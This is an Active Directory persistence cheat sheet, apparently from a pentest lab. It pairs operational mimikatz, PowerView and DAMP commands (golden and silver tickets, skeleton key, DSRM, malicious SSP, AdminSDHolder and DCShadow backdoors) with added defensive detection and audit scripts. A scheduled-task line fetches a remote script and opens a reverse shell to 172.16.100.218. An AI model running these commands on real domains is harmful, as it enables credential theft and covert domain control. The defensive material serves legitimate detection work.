# Persistence

## Golden Ticket

```
# Run as DA locally on DC to get krbtgt hash:
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' 

# Run Remotely as DA to get krbtgt hash:
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'

# Get Domain-SID:
Get-DomainSID

# Get Domain Ticket policy:
(Get-DomainPolicy)."kerberos.policy"

# Create ticket:
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:HASH /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'

# Use ticket:
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'

# Access

ls \\domain-dc\c$

Invoke-Mimikatz -Command '"lsadump::dcsync /user:DOMAIN\Administrator /domain:DOMAIN"'
```

## Silver Ticket

```
# Using DC$ hash to provide access to domain shares on DC:
Invoke-Mimikatz -Command '"kerberos::golden /domain:DOMAIN /sid:S-1-5-21-1874506631-3219952063-538504511 /target:DC.DOMAIN.local /service:CIFS /rc4:HASH /user:Administrator /ptt"'

# Create ticket for HOST (using DC$ hash) to allow us to schedule tasks on target:
Invoke-Mimikatz -Command '"kerberos::golden /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dc.DOMAIN.local /service:HOST /rc4:HASH /user:Administrator /ptt"'

# Schedule task with above silver ticket:
schtasks /create /S dc.DOMAIN.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "User" /TR "powershell iex (iwr http://172.16.100.218/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.218 -Port 443"
schtasks /Run /S dc.DOMAIN.local /TN "User"

# To execute WMI, both a HOST and an RPCSS ticket are needed:
Invoke-Mimikatz -Command '"kerberos::golden /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dc.DOMAIN.local /service:RPCSS /rc4:HASH /user:Administrator /ptt"'
```
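The two ticket types above are signed with long-lived keys: a golden ticket with the krbtgt key, a silver ticket with the target machine account's key (DC$ in the examples). Neither the `/endin` and `/renewmax` values nor the ticket itself leaves a trace of forgery, so the durable defence is key rotation, and the usable signal on the DC is the encryption type. The following check is an added example written for this page (it is not from the original cheat sheet or from mimikatz); it assumes the ActiveDirectory module, read access to the DC's Security log, a domain that has moved to AES so RC4 (0x17) service tickets are unusual, and the age thresholds shown, which are assumptions to tune for your estate.

```powershell
# Added defender-side check, not part of the original cheat sheet. Assumes
# the ActiveDirectory module, permission to read the DC's Security log, and
# a domain that has moved to AES so RC4 (0x17) service tickets are unusual.
# Thresholds and the DC selection are assumptions; adjust for the estate.
Import-Module ActiveDirectory

# 1. Age of the keys a forged ticket is signed with. A golden ticket stays
#    valid until krbtgt has been reset twice; a silver ticket (CIFS/HOST/
#    RPCSS above) stays valid until that machine account's password changes
#    (30 days by default, unless rotation has been disabled).
function Get-ForgeableKeyAge {
    param([int]$MaxKrbtgtDays = 180, [int]$MaxComputerDays = 30)
    $now = Get-Date
    $krbtgt = Get-ADUser -Identity krbtgt -Properties PasswordLastSet
    [pscustomobject]@{
        Account = 'krbtgt'
        AgeDays = [int]($now - $krbtgt.PasswordLastSet).TotalDays
        Stale   = ($now - $krbtgt.PasswordLastSet).TotalDays -gt $MaxKrbtgtDays
    }
    Get-ADComputer -Filter * -Properties PasswordLastSet |
        Where-Object { $_.PasswordLastSet -and ($now - $_.PasswordLastSet).TotalDays -gt $MaxComputerDays } |
        ForEach-Object {
            [pscustomobject]@{
                Account = $_.SamAccountName
                AgeDays = [int]($now - $_.PasswordLastSet).TotalDays
                Stale   = $true
            }
        }
}

# 2. kerberos::golden with /krbtgt or /rc4 (as above) produces RC4-signed
#    tickets, so a 4769 with TicketEncryptionType 0x17 in an AES domain is
#    worth reviewing, especially for Administrator or a DC-hosted service.
function Find-Rc4ServiceTickets {
    param([string]$DomainController = (Get-ADDomainController).HostName, [int]$Hours = 24)
    $filter = @{ LogName = 'Security'; Id = 4769; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -ComputerName $DomainController -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            $x = [xml]$_.ToXml()
            $d = @{}
            foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            if ($d.TicketEncryptionType -eq '0x17') {
                [pscustomobject]@{
                    Time    = $_.TimeCreated
                    User    = $d.TargetUserName
                    Service = $d.ServiceName
                    Client  = $d.IpAddress
                }
            }
        }
}

Get-ForgeableKeyAge | Format-Table -AutoSize
Find-Rc4ServiceTickets | Format-Table -AutoSize
```

Run it from a host with the RSAT AD tools as an account that can read the DC Security log. A stale krbtgt entry means every golden ticket ever forged against that key still works; resetting krbtgt twice, with replication allowed to complete between the resets, invalidates them. A stale computer account does the same for silver tickets against that host.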

## Skeleton Key

```
# Creating skeleton key
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dc.DOMAIN.local

# Using Skeleton Key (Password is "mimikatz")
Enter-PSSession -ComputerName dc -Credential DOMAIN\Administrator
```
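Because `misc::skeleton` patches LSASS in memory on the DC it runs on, the patched DC accepts the master password ("mimikatz") for every account alongside the real password, and a reboot removes it. That gives a direct test: authenticate a dedicated canary account with the master password against each DC individually; any DC that accepts it is patched. The following probe is an added example for this page, not code from the original page or from mimikatz. It assumes the ActiveDirectory module, a dedicated unprivileged canary account (the name is a placeholder) whose real password is not "mimikatz", and that one failed logon per DC against that account is acceptable.

```powershell
# Added detection example, not part of the original page. Assumes a
# dedicated, unprivileged canary account (placeholder name) whose real
# password is not the skeleton master password, and the ActiveDirectory
# module for the DC list. Each DC is tested on its own because the patch
# lives only in that DC's LSASS and does not replicate or survive a reboot.
Import-Module ActiveDirectory
Add-Type -AssemblyName System.DirectoryServices.AccountManagement

function Test-SkeletonKey {
    param(
        [string]$CanaryUser = 'svc-canary',             # placeholder account name
        [string]$MasterPassword = 'mimikatz',            # misc::skeleton default
        [string[]]$DomainControllers = (Get-ADDomainController -Filter * |
                                         Select-Object -ExpandProperty HostName)
    )
    foreach ($dc in $DomainControllers) {
        # Bind to this specific DC. A patched LSASS validates the master
        # password for any account; a clean one rejects it (one 4625/4771
        # for the canary account per DC, which is the expected outcome).
        $ctx = New-Object System.DirectoryServices.AccountManagement.PrincipalContext(
            [System.DirectoryServices.AccountManagement.ContextType]::Domain, $dc)
        try {
            $accepted = $ctx.ValidateCredentials($CanaryUser, $MasterPassword,
                [System.DirectoryServices.AccountManagement.ContextOptions]::Negotiate)
        } catch {
            $accepted = $false
        } finally {
            $ctx.Dispose()
        }
        [pscustomobject]@{
            DomainController   = $dc
            SkeletonKeyPresent = [bool]$accepted
        }
    }
}

Test-SkeletonKey | Format-Table -AutoSize
```

Schedule this alongside the RC4 ticket check: the skeleton key also downgrades Kerberos to RC4 for accounts that would otherwise use AES, so 4768/4769 events with encryption type 0x17 on a single DC are a corroborating signal. Remediation is a reboot of the affected DC followed by an investigation of how debug privilege on the DC was obtained.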

## DSRM (Directory Services Restore Mode)

The DSRM password is set when a DC is promoted and is the password of that DC's local Administrator account. By changing a registry value, the DSRM account's hash can be used in a pass-the-hash attack, which gives DA-level access on the DC with a password that is very unlikely to ever change.

```
# Dump DSRM passwords (requires DA):
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dc

# Change Reg:
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

# Pass the DSRM hash:
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dc /user:Administrator /ntlm:HASH  /run:powershell.exe"'
```

## Custom SSP

A Security Support Provider (SSP) is a DLL which provides ways for an application to obtain an authenticated connection. Some SSP Packages by Microsoft are NTLM, Kerberos, Wdigest, CredSSP. Mimikatz provides a custom SSP - mimilib.dll. This SSP logs local logons, service account and machine account passwords in clear text on the target server.

```
# Drop mimilib.dll into system32 and add mimilib to HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages:
$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages'| select -ExpandProperty 'Security Packages' 
$packages += "mimilib" 
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages 
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages

# Using mimikatz, inject into lsass (Not stable with Server 2016):
Invoke-Mimikatz -Command '"misc::memssp"'

# All log ons are now logged in clear too:
C:\Windows\system32\kiwissp.log
```
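Both the DSRM technique and the registry variant of the custom SSP leave a persistent, auditable state on the DC: a non-zero `DsrmAdminLogonBehavior`, an extra entry in `Security Packages`, and the DLL and log file on disk. The following audit is an added example for this page, not code from the original page or from mimikatz. It assumes the ActiveDirectory module, WinRM and admin rights on every DC, and the known-good package list shown, which is an assumption to be compared against a clean DC of the same OS build. It also looks for the `mimilsa.log` file that the in-memory `misc::memssp` variant writes, since that variant leaves no registry trace.

```powershell
# Added audit script, not part of the original page. Runs on every DC via
# WinRM and reports the DSRM and SSP persistence settings described above.
# Assumes the ActiveDirectory module and admin rights on the DCs. The
# known-good SSP list is an assumption; compare it with a clean DC of the
# same OS build before relying on it.
Import-Module ActiveDirectory

$KnownSecurityPackages = @('kerberos', 'msv1_0', 'schannel', 'wdigest', 'tspkg', 'pku2u', 'cloudap', '""')

$audit = {
    param($known)
    $lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $findings = @()

    # DSRM: DsrmAdminLogonBehavior = 2 lets the DSRM (local Administrator)
    # account log on while the DC is running normally. Absent or 0 is expected.
    $dsrm = (Get-ItemProperty -Path $lsa -Name DsrmAdminLogonBehavior -ErrorAction SilentlyContinue).DsrmAdminLogonBehavior
    if ($dsrm -and $dsrm -ne 0) {
        $findings += [pscustomobject]@{ Check = 'DsrmAdminLogonBehavior'; Value = $dsrm; Note = 'non-zero: DSRM account usable for network logon' }
    }

    # SSP: any package listed under Lsa or Lsa\OSConfig that is not on the
    # known list, or whose DLL is missing or not signed by Microsoft.
    foreach ($key in $lsa, "$lsa\OSConfig") {
        $pkgs = (Get-ItemProperty -Path $key -Name 'Security Packages' -ErrorAction SilentlyContinue).'Security Packages'
        foreach ($p in @($pkgs)) {
            if ([string]::IsNullOrWhiteSpace($p)) { continue }
            $name = $p.Trim().ToLower()
            if ($known -contains $name) { continue }
            $dll = Join-Path $env:SystemRoot "System32\$name.dll"
            $sig = if (Test-Path $dll) { (Get-AuthenticodeSignature $dll).SignerCertificate.Subject } else { 'DLL not found' }
            $findings += [pscustomobject]@{ Check = "Security Packages ($key)"; Value = $name; Note = "signer: $sig" }
        }
    }

    # Log files written by mimilib (registry SSP) and memssp (in-memory patch).
    foreach ($log in 'System32\kiwissp.log', 'System32\mimilsa.log') {
        $path = Join-Path $env:SystemRoot $log
        if (Test-Path $path) {
            $findings += [pscustomobject]@{ Check = 'credential log file'; Value = $path; Note = 'mimikatz SSP log present' }
        }
    }
    $findings
}

$dcs = Get-ADDomainController -Filter * | Select-Object -ExpandProperty HostName
Invoke-Command -ComputerName $dcs -ScriptBlock $audit -ArgumentList (,$KnownSecurityPackages) |
    Select-Object PSComputerName, Check, Value, Note | Format-Table -AutoSize
```

A hit on `DsrmAdminLogonBehavior` should be reset to 0 (or the value removed) and the DSRM password changed with `ntdsutil`; a hit on `Security Packages` means LSASS will load that DLL on the next boot, so remove the entry and the file before rebooting. Auditing registry writes to the `Lsa` key (event 4657) turns both into real-time alerts.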

## ACL Abuse - AdminSDHolder

Resides in the System container of a domain and is used to control the permissions, via an ACL, for certain built-in privileged groups (called Protected Groups). Its ACL is propagated to those groups and their members across AD every hour (SDProp).

{% tabs %}
{% tab title="PowerView" %}

```
# Giving a user full rights over AdminSDHolder groups: 
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights All -Verbose

# Giving user reset password rights:
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights ResetPassword -Verbose

# Giving user WriteMember privs:
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights WriteMembers -Verbose

# Check Domain Admins permission as normal user:
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'student1'}

# Abuse FullControl (powerview_dev):
Add-DomainGroupMember -Identity 'Domain Admins' -Members testda -Verbose

# Abusing ResetPassword (powerview_dev):
Set-DomainUserPassword -Identity testda -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose

# Add DCSYNC rights to a user:
Add-ObjectAcl -TargetDistinguishedName 'DC=DOMAIN,DC=local' -PrincipalSamAccountName student1 -Rights DCSync -Verbose
```

{% endtab %}

{% tab title="ADModule" %}

```
# Giving a user full rights over AdminSDHolder groups: 
Set-ADACL -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' -Principal student1 -Verbose

# Check Domain Admins permission as normal user:
(Get-Acl -Path 'AD:\CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access | ?{$_.IdentityReference -match 'student1'} 

# Abuse FullControl:
Add-ADGroupMember -Identity 'Domain Admins' -Members testda

# Abusing ResetPassword:
Set-ADAccountPassword -Identity testda -NewPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose

# Add DCSYNC rights:
Set-ADACL -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Principal student1 -GUIDRight DCSync -Verbose
```

{% endtab %}
{% endtabs %}

```
# Run SDProp manually using Invoke-SDPropagator.ps1: 
Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose

# For pre-Server 2008 machines: 
Invoke-SDPropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -Verbose
```
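Every right granted on AdminSDHolder is copied to each protected group and member within the hour, and the DCSync grant on the domain root is a second, independent foothold. Both are readable with the AD: drive, so they can be compared against a baseline on a schedule. The following audit is an added example for this page, not code from the original page, PowerView or the AD module; it assumes the ActiveDirectory module and the baseline trustee lists shown, which are assumptions for a default domain and should be adjusted to yours.

```powershell
# Added audit, not part of the original page. Assumes the ActiveDirectory
# module (AD: drive). The baseline trustee lists are assumptions for a
# default domain; anything outside them on AdminSDHolder, and any non-DC
# principal holding replication rights on the domain root, is reported.
Import-Module ActiveDirectory

$domain = Get-ADDomain
$nb = $domain.NetBIOSName
$adminSdHolder = "AD:\CN=AdminSDHolder,CN=System,$($domain.DistinguishedName)"

# Default AdminSDHolder trustees (assumed); adjust to your domain.
$Baseline = @(
    'NT AUTHORITY\SYSTEM', 'NT AUTHORITY\Authenticated Users', 'Everyone', 'NT AUTHORITY\SELF',
    'BUILTIN\Administrators', 'BUILTIN\Pre-Windows 2000 Compatible Access',
    'BUILTIN\Terminal Server License Servers', 'BUILTIN\Windows Authorization Access Group',
    "$nb\Domain Admins", "$nb\Enterprise Admins", "$nb\Cert Publishers",
    "$nb\Key Admins", "$nb\Enterprise Key Admins"
)

function Get-AdminSDHolderAnomalies {
    (Get-Acl -Path $adminSdHolder).Access |
        Where-Object { $Baseline -notcontains $_.IdentityReference.Value } |
        Select-Object @{n='Trustee';e={$_.IdentityReference}}, ActiveDirectoryRights, AccessControlType, ObjectType
}

# Accounts still carrying adminCount=1 that are no longer in a protected
# group keep the hardened ACL (inheritance off) and are easy to overlook.
function Get-OrphanedAdminCount {
    $protected = Get-ADGroup -LDAPFilter '(adminCount=1)' |
        ForEach-Object { Get-ADGroupMember -Identity $_.DistinguishedName -Recursive } |
        Select-Object -ExpandProperty DistinguishedName -Unique
    Get-ADUser -LDAPFilter '(adminCount=1)' |
        Where-Object { $protected -notcontains $_.DistinguishedName -and $_.SamAccountName -ne 'krbtgt' }
}

# DCSync needs the replication control-access rights on the domain root.
$ReplicationGuids = @(
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2',  # DS-Replication-Get-Changes
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2',  # DS-Replication-Get-Changes-All
    '89e95b76-444d-4c62-991a-0facbeda640c'   # DS-Replication-Get-Changes-In-Filtered-Set
)
function Get-DcSyncPrincipals {
    $expected = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
                  'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS',
                  "$nb\Domain Controllers", "$nb\Enterprise Read-only Domain Controllers")
    (Get-Acl -Path "AD:\$($domain.DistinguishedName)").Access |
        Where-Object { $_.AccessControlType -eq 'Allow' -and
                       $ReplicationGuids -contains $_.ObjectType.ToString() -and
                       $expected -notcontains $_.IdentityReference.Value } |
        Select-Object @{n='Trustee';e={$_.IdentityReference}}, @{n='RightGuid';e={$_.ObjectType}}
}

Get-AdminSDHolderAnomalies | Format-Table -AutoSize
Get-OrphanedAdminCount | Select-Object SamAccountName, DistinguishedName
Get-DcSyncPrincipals | Format-Table -AutoSize
```

Any trustee reported by the first function will, after the next SDProp run, hold the same right on Domain Admins and every other protected group, so remove the ACE on AdminSDHolder first and then on the groups it has already reached. Enabling auditing on AdminSDHolder and the domain root (event 5136, directory service object modified) catches the grant at the moment it is made rather than on the next scheduled run.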

## ACL Abuse - Security Descriptors

It is possible to modify Security Descriptors (security information like Owner, primary group, DACL and SACL) of multiple remote access methods (securable objects) to allow access to non-admin users. This is rarely checked.

{% tabs %}
{% tab title="WMI" %}

```
# On local machine for student1: 
Set-RemoteWMI -UserName student1 -Verbose

# On remote machine for student1 without explicit credentials: 
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose

# On remote machine with explicit credentials. Only root\cimv2 and nested namespaces: 
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc -Credential Administrator -namespace 'root\cimv2' -Verbose

# On remote machine remove permissions: 
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Remove -Verbose
```

{% endtab %}

{% tab title="PSRemote" %}

```
# On local machine for student1: 
Set-RemotePSRemoting -UserName student1 -Verbose

# On remote machine for student1 without credentials: 
Set-RemotePSRemoting -UserName student1 -ComputerName dcorp-dc -Verbose

# On remote machine, remove the permissions: 
Set-RemotePSRemoting -UserName student1 -ComputerName dcorp-dc -Remove
```

{% endtab %}

{% tab title="Remote Registry" %}

```
# Using DAMP, with admin privs on remote machine: 
Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student1 -Verbose

# As student1, retrieve machine account hash: 
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose

# Retrieve local account hash: 
Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose

# Retrieve domain cached credentials: 
Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose
```

{% endtab %}
{% endtabs %}
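The three tabs above each edit one security descriptor: the DACL of the `root\cimv2` WMI namespace, the SDDL of the PowerShell session configurations, and the ACLs of the registry keys behind remote registry access (including SAM and SECURITY, which is what makes the DAMP hash retrieval possible). All three are readable from an elevated session, so an unexpected trustee is straightforward to detect even though, as the text says, it is rarely checked. The following audit is an added example for this page, not code from the original page or from the DAMP/RACE tooling; it assumes WinRM and admin rights on the target host and the expected-trustee list shown, which is an assumption for a default build.

```powershell
# Added audit script, not part of the original page. Checks the three
# security descriptors the tabs above modify on one host (default: local)
# and reports trustees outside the expected set. The expected set is an
# assumption for a default build; compare against a clean host first.
function Get-RemoteAccessSdAnomalies {
    param(
        [string]$ComputerName = $env:COMPUTERNAME,
        [string[]]$Expected = @('BUILTIN\Administrators', 'NT AUTHORITY\SYSTEM',
                                'NT AUTHORITY\LOCAL SERVICE', 'NT AUTHORITY\NETWORK SERVICE',
                                'NT AUTHORITY\Authenticated Users', 'BUILTIN\Remote Management Users',
                                'NT AUTHORITY\INTERACTIVE', 'BUILTIN\Backup Operators')
    )
    Invoke-Command -ComputerName $ComputerName -ArgumentList (,$Expected) -ScriptBlock {
        param($expected)
        $out = @()

        # WMI: DACL of the root\cimv2 namespace (what Set-RemoteWMI edits).
        $sd = (Invoke-CimMethod -Namespace root/cimv2 -ClassName __SystemSecurity -MethodName GetSecurityDescriptor).Descriptor
        foreach ($ace in $sd.DACL) {
            $t = if ($ace.Trustee.Domain) { "$($ace.Trustee.Domain)\$($ace.Trustee.Name)" } else { $ace.Trustee.Name }
            if ($expected -notcontains $t) {
                $out += [pscustomobject]@{ Surface = 'WMI root\cimv2'; Trustee = $t; Detail = 'AccessMask 0x{0:X}' -f $ace.AccessMask }
            }
        }

        # PSRemoting: session configuration permissions (what Set-RemotePSRemoting edits).
        foreach ($cfg in Get-PSSessionConfiguration) {
            foreach ($entry in ($cfg.Permission -split ',\s*')) {
                $t = ($entry -replace '\s+(AccessAllowed|AccessDenied)$', '').Trim()
                if ($t -and $expected -notcontains $t) {
                    $out += [pscustomobject]@{ Surface = "PSRemoting $($cfg.Name)"; Trustee = $t; Detail = $entry }
                }
            }
        }

        # Remote registry: the winreg pipe key plus the SAM and SECURITY hives
        # that Add-RemoteRegBackdoor grants read access on.
        foreach ($key in 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg', 'HKLM:\SAM', 'HKLM:\SECURITY') {
            try { $acl = Get-Acl -Path $key -ErrorAction Stop } catch { continue }
            foreach ($ace in $acl.Access) {
                $t = $ace.IdentityReference.Value
                if ($expected -notcontains $t) {
                    $out += [pscustomobject]@{ Surface = "Registry $key"; Trustee = $t; Detail = "$($ace.RegistryRights) ($($ace.AccessControlType))" }
                }
            }
        }
        $out
    }
}

Get-RemoteAccessSdAnomalies | Format-Table -AutoSize
```

Run it against domain controllers and tier-0 servers first, since those are where a standing non-admin grant matters most. A finding on `HKLM:\SAM` or `HKLM:\SECURITY` for a user account should be treated as a credential exposure of that host's local accounts, machine account and cached domain credentials, not just a misconfiguration.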

## DCShadow - Forest Persistence

The machine needs to be part of the parent domain; this can be changed in the system properties with admin access and requires a restart of the computer. The user also needs to be a valid user in that domain, so they may need to be added first.

Requires two consoles: one as DA, one as SYSTEM. SYSTEM sets up the fake DC, DA pushes the replication.

```
# Setting up Fake DC
.\mimikatz.exe
mimikatz# !+
mimikatz# !processtoken
mimikatz# lsadump::dcshadow /object:targetuser /attribute:serviceprincipalname /value:uniquespn/DC1

# On DA terminal
mimikatz -command '"lsadump::dcshadow /push"'
```

Allowing DCShadow to a user so they can run it without DA privileges, for persistence. Once done, the user can run the /push step without DA; the first terminal still needs SYSTEM privileges.

```
Set-DCShadowPermissions -FakeDC USER -SAMAccountName USER -Username studentx -Verbose
```
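A DCShadow push registers the attacking machine as a DC for the duration of the push: an nTDSDSA object appears under the site's server object in the Configuration partition and the machine account briefly gets DC-style SPNs (the `GC/` SPN and the DRS replication SPN class), then both are removed. Those transient changes are the detection surface. The following is an added example for this page, not code from the original page or from mimikatz; it assumes the ActiveDirectory module, read access to the DC Security log, and that directory service object auditing is enabled on the Configuration partition so that 5137/5141 are recorded.

```powershell
# Added detection example, not part of the original page. Assumes the
# ActiveDirectory module and read access to the DC Security log, with
# directory service object auditing enabled so 5137/5141 exist.
Import-Module ActiveDirectory

function Get-ForestDomainControllers {
    (Get-ADForest).Domains | ForEach-Object { Get-ADDomainController -Filter * -Server $_ }
}

# 1. Every nTDSDSA (NTDS Settings) object in the forest configuration must
#    belong to a real DC; anything else is a rogue or stale registration.
#    DCShadow removes its object after the push, so this catches pushes in
#    progress and failed clean-ups; the event check below covers the rest.
function Get-UnknownDsaObjects {
    $realDcs = Get-ForestDomainControllers | Select-Object -ExpandProperty Name
    $cfg = (Get-ADRootDSE).configurationNamingContext
    Get-ADObject -SearchBase "CN=Sites,$cfg" -LDAPFilter '(objectClass=nTDSDSA)' |
        ForEach-Object {
            # parent of the NTDS Settings object is the server object, CN=<DC name>
            $server = ($_.DistinguishedName -split ',', 2)[1]
            $serverName = (($server -split ',')[0] -replace '^CN=', '')
            if ($realDcs -notcontains $serverName) {
                [pscustomobject]@{ Server = $serverName; DistinguishedName = $_.DistinguishedName }
            }
        }
}

# 2. 4742 (computer account changed) with DC-style SPNs on a non-DC account,
#    and 5137/5141 (object created/deleted) for nTDSDSA objects.
function Find-DcShadowEvents {
    param([string]$DomainController = (Get-ADDomainController).HostName, [int]$Hours = 24)
    $realDcAccounts = Get-ForestDomainControllers | ForEach-Object { "$($_.Name)$".ToUpper() }
    $drsGuid = 'E3514235-4B06-11D1-AB04-00C04FC2DCD2'   # SPN class used for DRS replication
    $filter = @{ LogName = 'Security'; Id = 4742, 5137, 5141; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -ComputerName $DomainController -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            $evt = $_
            $x = [xml]$evt.ToXml(); $d = @{}
            foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            if ($evt.Id -eq 4742) {
                $spns = [string]$d.ServicePrincipalNames
                $acct = "$($d.TargetUserName)".ToUpper()
                if (($spns -match 'GC/' -or $spns -match $drsGuid) -and $realDcAccounts -notcontains $acct) {
                    [pscustomobject]@{ Time = $evt.TimeCreated; Id = 4742; Subject = $d.SubjectUserName; Object = $d.TargetUserName; Detail = 'DC-style SPNs set on a non-DC computer account' }
                }
            } elseif ($d.ObjectClass -eq 'nTDSDSA') {
                [pscustomobject]@{ Time = $evt.TimeCreated; Id = $evt.Id; Subject = $d.SubjectUserName; Object = $d.ObjectDN; Detail = 'nTDSDSA object created (5137) or deleted (5141)' }
            }
        }
}

Get-UnknownDsaObjects | Format-Table -AutoSize
Find-DcShadowEvents | Format-Table -AutoSize
```

A legitimate DC promotion produces the same 4742 and 5137 events, so correlate hits with change records. The `Set-DCShadowPermissions` grant above is itself visible in the same way as the DCSync grant in the ACL abuse section: the user is given rights on the Sites container and on their own computer object, and a 5136 on `CN=Sites` in the Configuration partition by a non-admin is the earliest point to catch it.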


